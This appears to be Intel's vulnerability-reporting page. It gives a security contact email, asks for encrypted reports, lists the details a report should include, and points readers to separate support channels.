**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#intel